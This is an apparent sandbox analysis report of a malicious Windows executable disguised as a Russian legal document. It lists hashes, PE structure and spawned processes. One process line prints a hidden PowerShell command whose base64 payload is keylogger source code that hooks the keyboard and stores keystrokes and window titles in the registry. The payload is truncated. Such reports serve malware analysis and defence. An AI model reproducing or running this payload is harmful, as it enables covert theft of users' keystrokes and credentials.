| File name: | Исполнительный лист 1840120-22.exe |
| Full analysis: | https://app.any.run/tasks/7e487f61-54aa-451c-b8bd-2375a6cd159d |
| Verdict: | Malicious activity |
| Analysis date: | February 14, 2022, 06:52:37 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Indicators: | |
| MIME: | application/x-dosexec |
| File info: | PE32 executable (GUI) Intel 80386, for MS Windows |
| MD5: | D68180819BB8EB8207DC6AB74C1A4642 |
| SHA1: | 05D9CD6D8D433D305600E3CF8E9FBB6079492376 |
| SHA256: | C2092159A11D0E36FF2E2B711F14AED732AA95BBBD673FD94150ADA32FE38254 |
| SSDEEP: | 6144:uOYGXaPNxdgSdcq2pVZPOJHAbK/Y1QCPqwdL0:qGqN/XdctpVtkPY+bwdL |
| .exe | | | Win32 Executable (generic) (52.9) |
|---|---|---|
| .exe | | | Generic Win/DOS Executable (23.5) |
| .exe | | | DOS Executable Generic (23.5) |
| Subsystem: | Windows GUI |
|---|---|
| SubsystemVersion: | 5.1 |
| ImageVersion: | - |
| OSVersion: | 5.1 |
| EntryPoint: | 0x1e239 |
| UninitializedDataSize: | - |
| InitializedDataSize: | 108544 |
| CodeSize: | 198656 |
| LinkerVersion: | 14 |
| PEType: | PE32 |
| TimeStamp: | 2019:12:05 08:37:23+01:00 |
| MachineType: | Intel 386 or later, and compatibles |
| Architecture: | IMAGE_FILE_MACHINE_I386 |
|---|---|
| Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
| Compilation Date: | 05-Dec-2019 07:37:23 |
| Detected languages: |
|
| Debug artifacts: |
|
| Magic number: | MZ |
|---|---|
| Bytes on last page of file: | 0x0090 |
| Pages in file: | 0x0003 |
| Relocations: | 0x0000 |
| Size of header: | 0x0004 |
| Min extra paragraphs: | 0x0000 |
| Max extra paragraphs: | 0xFFFF |
| Initial SS value: | 0x0000 |
| Initial SP value: | 0x00B8 |
| Checksum: | 0x0000 |
| Initial IP value: | 0x0000 |
| Initial CS value: | 0x0000 |
| Overlay number: | 0x0000 |
| OEM identifier: | 0x0000 |
| OEM information: | 0x0000 |
| Address of NE header: | 0x00000118 |
| Signature: | PE |
|---|---|
| Machine: | IMAGE_FILE_MACHINE_I386 |
| Number of sections: | 6 |
| Time date stamp: | 05-Dec-2019 07:37:23 |
| Pointer to Symbol Table: | 0x00000000 |
| Number of symbols: | 0 |
| Size of Optional Header: | 0x00E0 |
| Characteristics: |
|
Name | Virtual Address | Virtual Size | Raw Size | Charateristics | Entropy |
|---|---|---|---|---|---|
.text | 0x00001000 | 0x0003060F | 0x00030800 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 6.69302 |
.rdata | 0x00032000 | 0x0000A402 | 0x0000A600 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 5.20298 |
.data | 0x0003D000 | 0x000238B0 | 0x00001200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 3.83802 |
.gfids | 0x00061000 | 0x000000E8 | 0x00000200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 2.11817 |
.rsrc | 0x00062000 | 0x0000CB6F | 0x0000CC00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 6.73079 |
.reloc | 0x0006F000 | 0x0000212C | 0x00002200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ | 6.62179 |
Title | Entropy | Size | Codepage | Language | Type |
|---|---|---|---|---|---|
1 | 5.25329 | 1875 | Latin 1 / Western European | English - United States | RT_MANIFEST |
2 | 4.54911 | 9640 | UNKNOWN | Process Default Language | RT_ICON |
3 | 4.44244 | 4264 | UNKNOWN | Process Default Language | RT_ICON |
4 | 4.38604 | 1128 | UNKNOWN | Process Default Language | RT_ICON |
7 | 3.1586 | 482 | Latin 1 / Western European | English - United States | RT_STRING |
8 | 3.11685 | 460 | Latin 1 / Western European | English - United States | RT_STRING |
9 | 3.11236 | 440 | Latin 1 / Western European | English - United States | RT_STRING |
10 | 2.99727 | 326 | Latin 1 / Western European | English - United States | RT_STRING |
11 | 3.2036 | 1094 | Latin 1 / Western European | English - United States | RT_STRING |
12 | 3.12889 | 358 | Latin 1 / Western European | English - United States | RT_STRING |
KERNEL32.dll |
USER32.dll (delay-loaded) |
gdiplus.dll |
PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 1488 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\0g2bwtd2.cmdline" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 4.0.30319.34209 built by: FX452RTMGDR | ||||
| 2768 | wscript.exe "C:\Users\admin\AppData\Local\3b45c9b90.js" | C:\Windows\system32\wscript.exe | taskeng.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft � Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
| 2780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES3985.tmp" "c:\Users\admin\AppData\Local\Temp\CSCF2DCC0F2C3724F8B924F20541D8D92E.TMP" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft� Resource File To COFF Object Conversion Utility Exit code: 0 Version: 12.00.51209.34209 built by: FX452RTMGDR | ||||
| 2796 | "C:\Users\admin\AppData\Local\Temp\?????????????? ???? 1840120-22.exe" | C:\Users\admin\AppData\Local\Temp\?????????????? ???? 1840120-22.exe | — | Explorer.EXE |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
| 3412 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\3248932318.js" "C:\Users\admin\AppData\Local\Temp\?????????????? ???? 1840120-22.exe" | C:\Windows\System32\WScript.exe | ?????????????? ???? 1840120-22.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft � Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
| 3804 | powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc QQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsAdQBzAGkAbgBnACAATQBpAGMAcgBvAHMAbwBmAHQALgBXAGkAbgAzADIAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEkATwA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzADsAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMAOwBuAGEAbQBlAHMAcABhAGMAZQAgAGcAMQBlADMAMgBhAGEAYQA0AHsAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAGEANwA2ADAANwA2ADIAMQAwAHsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZgA2AGYAZQBhADQAZAA2ADYAIABhADMANwBhAGUAYQA0ADgAMgAgAD0AIABpADMAMwA1AGMAOQBhADAAMwA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGYAMQBkAGEANQAyADEAOQAzACAAZgAzADQAMwBjADYANQAzADMAIAA9ACAAYQAyAGUANQA4ADcAZAAwADUAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABJAG4AdABQAHQAcgAgAGoAZAA2ADEAYgA1AGEAMwAyACAAPQAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwA7AHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABtADMAZABiAGIAMQA1ADQAYQAgAGsAOAA2AGQANAA4ADcAOQBlADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAGwAYwA0AGYAZgBiADUAMAAyADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAGwAMgAxAGMANwAxAGYAZQBhADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAGUANwA5AGIAOQBkAGMAYQA2ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGMAOQBhADgAOQBhADUANQA3ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAG8AYQAyADQAZQBiAGUAYwAyADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGMAZgA0AGYAZAAwAGUAOAAzADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABiAGEANwA2ADkANAA2AGYANgA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAHMAdAByAGkAbgBnACAAYgA0ADIAYgA4ADQAZQAzADYAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAGcAYQAxAGUAYgA1AGIAOABmADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABkADgAYgA5ADgAZQA1ADUAMAA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAHMAdAByAGkAbgBnACAAYQA1ADYAYgAwADAAMAA3AGQAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAHAAOQBiADkAYwA5ADkAZQA2ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABuAGQAMgBkAGQAZgA3ADMANwA7AHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIAB2AG8AaQBkACAAUgB1AG4AKABtADMAZABiAGIAMQA1ADQAYQAgAGUANABjAGMAZAA3ADYAYwBhACkAewBrADgANgBkADQAOAA3ADkAZQAgAD0AIABlADQAYwBjAGQANwA2AGMAYQA7AGMAZgA0AGYAZAAwAGUAOAAzACAAPQAgAG4AZQB3ACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAoACkAOwBiADQAMgBiADgANABlADMANgAgAD0AIAAiAFMAbwBmAHQAdwBhAHIAZQBcAFwATQBpAGMAcgBvAHMAbwBmAHQAXABcAFcAaQBuAGQAbwB3AHMAXABcAEQAVwBNACIAOwBnAGEAMQBlAGIANQBiADgAZgAgAD0AIAAiAEgASwBFAFkAXwBDAFUAUgBSAEUATgBUAF8AVQBTAEUAUgBcAFwAIgAgACsAIABiADQAMgBiADgANABlADMANgA7AHMAdAByAGkAbgBnACAAZABlAGIAZABmADUANwBhAGQAIAA9ACAAawA2ADEAOQAxADgAYwAxADAAKAApADsAaQBmACAAKABkAGUAYgBkAGYANQA3AGEAZAAgAD0APQAgACIAIgApACAAcgBlAHQAdQByAG4AOwBkADgAYgA5ADgAZQA1ADUAMAAgAD0AIABkAGUAYgBkAGYANQA3AGEAZAAgACsAIAAiAGEAIgA7AGEANQA2AGIAMAAwADAANwBkACAAPQAgAGQAZQBiAGQAZgA1ADcAYQBkACAAKwAgACIAcwAiADsAcAA5AGIAOQBjADkAOQBlADYAIAA9ACAAZABlAGIAZABmADUANwBhAGQAIAArACAAIgBtACIAOwB1AGkAbgB0ACAAaQAyAGIAZQAwADQAMgBkAGYAIAA9ACAATwBwAGUAbgBNAHUAdABlAHgAKAAwAHgAMAAwADEAMAAwADAAMAAwACwAIABmAGEAbABzAGUALAAgAHAAOQBiADkAYwA5ADkAZQA2ACkAOwBpAGYAIAAoAGkAMgBiAGUAMAA0ADIAZABmACAAIQA9ACAAMAApACAARQB4AGkAdABQAHIAbwBjAGUAcwBzACgAMAApADsAQwByAGUAYQB0AGUATQB1AHQAZQB4ACgASQBuAHQAUAB0AHIALgBaAGUAcgBvACwAIAB0AHIAdQBlACwAIABwADkAYgA5AGMAOQA5AGUANgApADsAYgBhADcANgA5ADQANgBmADYAIAA9ACAAIgAiADsAbAAyADEAYwA3ADEAZgBlAGEAIAA9ACAARwBlAHQARgBvAHIAZQBnAHIAbwB1AG4AZABXAGkAbgBkAG8AdwAoACkAOwBpAG4AdAAgAG8ANQA5AGQAMwBhAGEANQA4ACAAPQAgAEcAZQB0AFcAaQBuAGQAbwB3AFQAZQB4AHQATABlAG4AZwB0AGgAKABsADIAMQBjADcAMQBmAGUAYQApADsAbwBhADIANABlAGIAZQBjADIAIAA9ACAAbgBlAHcAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACgAbwA1ADkAZAAzAGEAYQA1ADgAIAArACAAMQApADsARwBlAHQAVwBpAG4AZABvAHcAVABlAHgAdAAoAGwAMgAxAGMANwAxAGYAZQBhACwAIABvAGEAMgA0AGUAYgBlAGMAMgAsACAAbwA1ADkAZAAzAGEAYQA1ADgAIAArACAAMQApADsAdQBpAG4AdAAgAGUANwA5AGIAOQBkAGMAYQA2ACAAPQAgADAAOwBHAGUAdABXAGkAbgBkAG8AdwBUAGgAcgBlAGEAZABQAHIAbwBjAGUAcwBzAEkAZAAoAGwAMgAxAGMANwAxAGYAZQBhACwAIAByAGUAZgAgAGUANwA5AGIAOQBkAGMAYQA2ACkAOwBQAHIAbwBjAGUAcwBzACAAZwA0AGQAYwA3ADgAZQBiADIAIAA9ACAAUAByAG8AYwBlAHMAcwAuAEcAZQB0AFAAcgBvAGMAZQBzAHMAQgB5AEkAZAAoACgAaQBuAHQAKQBlADcAOQBiADkAZABjAGEANgApADsAaQBmACAAKABnADQAZABjADcAOABlAGIAMgAgACEAPQAgAG4AdQBsAGwAKQAgAG4AZAAyAGQAZABmADcAMwA3ACAAPQAgAGcANABkAGMANwA4AGUAYgAyAC4AUAByAG8AYwBlAHMAcwBOAGEAbQBlADsAIABlAGwAcwBlACAAbgBkADIAZABkAGYANwAzADcAIAA9ACAAIgAiADsAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAuAFoAZQByAG8ALAAgADAALAAgAGYAMwA0ADMAYwA2ADUAMwAzACwAIABJAG4AdABQAHQAcgAuAFoAZQByAG8ALAAgADAALAAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwApADsAagBkADYAMQBiADUAYQAzADIAIAA9ACAAaQBhAGUAOAA2AGUAOQAyAGQAKABhADMANwBhAGUAYQA0ADgAMgApADsAQQBwAHAAbABpAGMAYQB0AGkAbwBuAC4AUgB1AG4AKAApADsAVQBuAGgAbwBvAGsAVwBpAG4AZABvAHcAcwBIAG8AbwBrAEUAeAAoAGoAZAA2ADEAYgA1AGEAMwAyACkAOwB9AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAEkAbgB0AFAAdAByACAAaQBhAGUAOAA2AGUAOQAyAGQAKABmADYAZgBlAGEANABkADYANgAgAGEAMwA3AGEAZQBhADQAOAAyACkAewBJAG4AdABQAHQAcgAgAGYAYgBhADkAYwBlADUAMQAyACAAPQAgAEcAZQB0AE0AbwBkAHUAbABlAEgAYQBuAGQAbABlACgAUAByAG8AYwBlAHMAcwAuAEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ATQBvAGQAdQBsAGUATgBhAG0AZQApADsAcgBlAHQAdQByAG4AIABTAGUAdABXAGkAbgBkAG8AdwBzAEgAbwBvAGsARQB4ACgAMQAzACwAIABhADMANwBhAGUAYQA0ADgAMgAsACAAZgBiAGEAOQBjAGUANQAxADIALAAgADAAKQA7AH0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdgBvAGkAZAAgAGwANQAxADAAOAA0AGUANAA0ACgAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAG0AOQAzADQANABiADIAYwA5ACwAIABzAHQAcgBpAG4AZwAgAG0AMAA2AGYANwAwADUAOAA5ACwAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACAAbABiADUANwAxAGYAYgBmADYAKQB7AHQAcgB5AHsAcwB0AHIAaQBuAGcAIABoADIANABiADQAOQBhAGQAMABkAGEAdABhAF8AIAA9ACAAUgBlAGcAaQBzAHQAcgB5AC4ARwBlAHQAVgBhAGwAdQBlACgAZwBhADEAZQBiADUAYgA4AGYALAAgAGQAOABiADkAOABlADUANQAwACwAIAAiACIAKQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAOwBoADIANABiADQAOQBhAGQAMABkAGEAdABhAF8AIAA9ACAAaAAyADQAYgA0ADkAYQBkADAAZABhAHQAYQBfACAAKwAgAEQAYQB0AGUAVABpAG0AZQAuAE4AbwB3ACAAKwAgACIAIABbACIAIAArACAAbQA5ADMANAA0AGIAMgBjADkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACIAXQAgAC0AIAAiACAAKwAgAG0AMAA2AGYANwAwADUAOAA5ACAAKwAgACIAXAByAFwAbgAiACAAKwAgAGwAYgA1ADcAMQBmAGIAZgA2AC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAiAFwAcgBcAG4AXAByAFwAbgAiADsAUgBlAGcAaQBzAHQAcgB5AC4AUwBlAHQAVgBhAGwAdQBlACgAZwBhADEAZQBiADUAYgA4AGYALAAgAGQAOABiADkAOABlADUANQAwACwAIABoADIANABiADQAOQBhAGQAMABkAGEAdABhAF8AKQA7AH0AYwBhAHQAYwBoACAAewAgAH0AfQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAGsANgAxADkAMQA4AGMAMQAwACgAKQB7AGkAbgB0ACAAZABlAGIAZABmADUANwBhAGQAIAA9ACAAMAA7AHUAaQBuAHQAIABuAGUAYgA5AGIANQAwADMANAAgAD0AIAAwADsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGUAZQAyADgAZgBlADUANAA5ACAAPQAgAG4AZQB3ACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAoADIANQA2ACkAOwBVAEkAbgB0ADMAMgAgAGQAYQAyADkAZgA0ADYAYgBjACAAPQAgAG4AZQB3ACAAVQBJAG4AdAAzADIAKAApADsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGQAYQBkAGMAMAA1ADIANABlACAAPQAgAG4AZQB3ACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAoADIANQA2ACkAOwBpAGYAIAAoAEcAZQB0AFYAbwBsAHUAbQBlAEkAbgBmAG8AcgBtAGEAdABpAG8AbgAoACIAQwA6AFwAXAAiACwAIABlAGUAMgA4AGYAZQA1ADQAOQAsACAAKABVAEkAbgB0ADMAMgApAGUAZQAyADgAZgBlADUANAA5AC4AQwBhAHAAYQBjAGkAdAB5ACwAIAByAGUAZgAgAGQAZQBiAGQAZgA1ADcAYQBkACwAcgBlAGYAIABuAGUAYgA5AGIANQAwADMANAAsACAAcgBlAGYAIABkAGEAMgA5AGYANAA2AGIAYwAsACAAZABhAGQAYwAwADUAMgA0AGUALAAgACgAVQBJAG4AdAAzADIAKQBkAGEAZABjADAANQAyADQAZQAuAEMAYQBwAGEAYwBpAHQAeQApACAAIQA9ACAAMAApAHsAaQBmACAAKABkAGUAYgBkAGYANQA3AGEAZAAgADwAIAAwACkAIABkAGUAYgBkAGYANQA3AGEAZAAgAD0AIAAoADAAIAAtACAAZABlAGIAZABmADUANwBhAGQAKQA7AHIAZQB0AHUAcgBuACAAZABlAGIAZABmADUANwBhAGQALgBUAG8AUwB0AHIAaQBuAGcAKAAiAHgAOAAiACkAOwB9AGUAbABzAGUAIAByAGUAdAB1AHIAbgAgACIAIgA7AH0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAaQBuAHQAIABsAGUAMAA2ADQAYwBhAGIAMgAoAEkAbgB0AFAAdAByACAAYQA3ADkAZgA0ADAAMAA0AGEAKQB7AHIAZQB0AHUAcgBuACAATQBhAHIAcwBoAGEAbAAuAFIAZQBhAGQASQBuAHQAMwAyACgAYQA3ADkAZgA0ADAAMAA0AGEAKQA7AH0AcAByAGkAdgBhAHQAZQAgAGQAZQBsAGUAZwBhAHQAZQAgAEkAbgB0AFAAdAByACAAZgA2AGYAZQBhADQAZAA2ADYAKABpAG4AdAAgAGUAYgBmADUAZgAyAGIANAA1ACwAIABJAG4AdABQAHQAcgAgAG0AMgBmADEANgA0ADgAYQAyACwAIABJAG4AdABQAHQAcgAgAGkAYQBjAGYANQA1ADgANQBmACkAOwBwAHUAYgBsAGkAYwAgAGQAZQBsAGUAZwBhAHQAZQAgAHUAaQBuAHQAIABmADEAZABhADUAMgAxADkAMwAoAEkAbgB0AFAAdAByACAAcABQAGEAcgBhAG0AKQA7AHAAdQBiAGwAaQBjACAAZABlAGwAZQBnAGEAdABlACAAdgBvAGkAZAAgAG0AMwBkAGIAYgAxADUANABhACgAKQA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAEkAbgB0AFAAdAByACAAaQAzADMANQBjADkAYQAwADMAKABpAG4AdAAgAGUAYgBmADUAZgAyAGIANAA1ACwAIABJAG4AdABQAHQAcgAgAG0AMgBmADEANgA0ADgAYQAyACwAIABJAG4AdABQAHQAcgAgAGkAYQBjAGYANQA1ADgANQBmACkAewBpAGYAIAAoAGUAYgBmADUAZgAyAGIANAA1ACAAPgA9ACAAMAAgACYAJgAgAG0AMgBmADEANgA0ADgAYQAyACAAPQA9ACAAKABJAG4AdABQAHQAcgApADAAeAAwADEAMAAwACkAewBpAG4AdAAgAGkAMQAwADQANQBiADQAYwBkACAAPQAgAGwAZQAwADYANABjAGEAYgAyACgAaQBhAGMAZgA1ADUAOAA1AGYAKQA7AGkAZgAgACgAaQAxADAANAA1AGIANABjAGQAIAA8ACAAOAApACAAcgBlAHQAdQByAG4AIABDAGEAbABsAE4AZQB4AHQASABvAG8AawBFAHgAKABqAGQANgAxAGIANQBhADMAMgAsACAAZQBiAGYANQBmADIAYgA0ADUALAAgAG0AMgBmADEANgA0ADgAYQAyACwAIABpAGEAYwBmADUANQA4ADUAZgApADsAawA4ADYAZAA0ADgANwA5AGUAKAApADsAYgBvAG8AbAAgAGsAOQA5ADgAMwBiADQAOQA5ACAAPQAgACgAaQAxADAANAA1AGIANABjAGQAIAA9AD0AIAA4ACkAOwBiAG8AbwBsACAAZwA0ADAAMQBkADMAYwBiADgAIAA9ACAAKABpADEAMAA0ADUAYgA0AGMAZAAgAD0APQAgADQANgApADsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGMAZgAxADkAOABiAGEANAA2ACAAPQAgAG4AZQB3ACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAoACkAOwBiAHkAdABlAFsAXQAgAGoANQBhAGYAYgA4AGUANgAwACAAIAA9ACAAbgBlAHcAIABiAHkAdABlAFsAMgA1ADUAXQA7AGkAZgAgACgARwBlAHQASwBlAHkAYgBvAGEAcgBkAFMAdABhAHQAZQAoAGoANQBhAGYAYgA4AGUANgAwACkAKQB7AHUAaQBuAHQAIABiAGMANgA1AGEAMABiAGMAZAAgAD0AIABNAGEAcABWAGkAcgB0AHUAYQBsAEsAZQB5ACgAaQAxADAANAA1AGIANABjAGQALAAgADMAKQA7AGwAYwA0AGYAZgBiADUAMAAyACAAPQAgAEcAZQB0AEYAbwByAGUAZwByAG8AdQBuAGQAVwBpAG4AZABvAHcAKAApADsAdQBpAG4AdAAgAGIANAA3AGMAOQAwAGEAZAAyACAAPQAgADAAOwB1AGkAbgB0ACAAcABhAGYAOAA1AGMANQAzAGEAIAA9ACAARwBlAHQAVwBpAG4AZABvAHcAVABoAHIAZQBhAGQAUAByAG8AYwBlAHMAcwBJAGQAKABsAGMANABmAGYAYgA1ADAAMgAsACAAcgBlAGYAIABiADQANwBjADkAMABhAGQAMgApADsAdQBpAG4AdAAgAGIAYQBhADIAMwAxADMAYgBjACAAPQAgAEcAZQB0AEsAZQB5AGIAbwBhAHIAZABMAGEAeQBvAHUAdAAoAHAAYQBmADgANQBjADUAMwBhACkAOwBpAGYAIAAoAGsAOQA5ADgAMwBiADQAOQA5ACAAfAB8ACAAZwA0ADAAMQBkADMAYwBiADgAIAB8AHwAIAAoAFQAbwBVAG4AaQBjAG8AZABlAEUAeAAoAGkAMQAwADQANQBiADQAYwBkACwAIABiAGMANgA1AGEAMABiAGMAZAAsACAAagA1AGEAZgBiADgAZQA2ADAALAAgAGMAZgAxADkAOABiAGEANAA2ACwAIABjAGYAMQA5ADgAYgBhADQANgAuAEMAYQBwAGEAYwBpAHQAeQAsACAAKAB1AGkAbgB0ACkAMAAsACAAYgBhAGEAMgAzADEAMwBiAGMAKQAgAD4AIAAwACkAKQB7AGkAbgB0ACAAbwA1ADkAZAAzAGEAYQA1ADgAIAA9ACAARwBlAHQAVwBpAG4AZABvAHcAVABlAHgAdABMAGUAbgBnAHQAaAAoAGwAYwA0AGYAZgBiADUAMAAyACkAOwBjADkAYQA4ADkAYQA1ADUANwAgAD0AIABuAGUAdwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAKABvADUAOQBkADMAYQBhADUAOAAgACsAIAAxACkAOwBHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0ACgAbABjADQAZgBmAGIANQAwADIALAAgAGMAOQBhADgAOQBhADUANQA3ACwAIABvADUAOQBkADMAYQBhADUAOAAgACsAIAAxACkAOwBpAGYAIAAoACgAYgA0ADcAYwA5ADAAYQBkADIAIAAhAD0AIABlADcAOQBiADkAZABjAGEANgApACAAfAB8ACAAKABsAGMANABmAGYAYgA1ADAAMgAgACEAPQAgAGwAMgAxAGMANwAxAGYAZQBhACkAIAB8AHwAIAAoAG8AYQAyADQAZQBiAGUAYwAyAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACEAPQAgAGMAOQBhADgAOQBhADUANQA3AC4AVABvAFMAdAByAGkAbgBnACgAKQApACkAewBsADUAMQAwADgANABlADQANAAoAG8AYQAyADQAZQBiAGUAYwAyACwAIABuAGQAMgBkAGQAZgA3ADMANwAsACAAYwBmADQAZgBkADAAZQA4ADMAKQA7AG8AYQAyADQAZQBiAGUAYwAyAC4AUgBlAG0AbwB2AGUAKAAwACwAIABvAGEAMgA0AGUAYgBlAGMAMgAuAEwAZQBuAGcAdABoACkAOwBvAGEAMgA0AGUAYgBlAGMAMgAuAEEAcABwAGUAbgBkACgAYwA5AGEAOAA5AGEANQA1ADcAKQA7AGMAZgA0AGYAZAAwAGUAOAAzAC4AUgBlAG0AbwB2AGUAKAAwACwAIABjAGYANABmAGQAMABlADgAMwAuAEwAZQBuAGcAdABoACkAOwBsADIAMQBjADcAMQBmAGUAYQAgAD0AIABsAGMANABmAGYAYgA1ADAAMgA7AFAAcgBvAGMAZQBzAHMAIABnADQAZABjADcAOABlAGIAMgAgAD0AIABQAHIAbwBjAGUAcwBzAC4ARwBlAHQAUAByAG8AYwBlAHMAcwBCAHkASQBkACgAKABpAG4AdAApAGIANAA3AGMAOQAwAGEAZAAyACkAOwBpAGYAIAAoAGcANABkAGMANwA4AGUAYgAyACAAIQA9ACAAbgB1AGwAbAApACAAbgBkADIAZABkAGYANwAzADcAIAA9ACAAZwA0AGQAYwA3ADgAZQBiADIALgBQAHIAbwBjAGUAcwBzAE4AYQBtAGUAOwAgAGUAbABzAGUAIABuAGQAMgBkAGQAZgA3ADMANwAgAD0AIAAiACIAOwBlADcAOQBiADkAZABjAGEANgAgAD0AIABiADQANwBjADkAMABhAGQAMgA7AH0AaQBmACAAKABpADEAMAA0ADUAYgA0AGMAZAAgAD4AIAA3ACkAewBpAGYAIAAoAGsAOQA5ADgAMwBiADQAOQA5ACkAIABjAGYANABmAGQAMABlADgAMwAuAEEAcABwAGUAbgBkACgAIgBbAKsAXQAiAC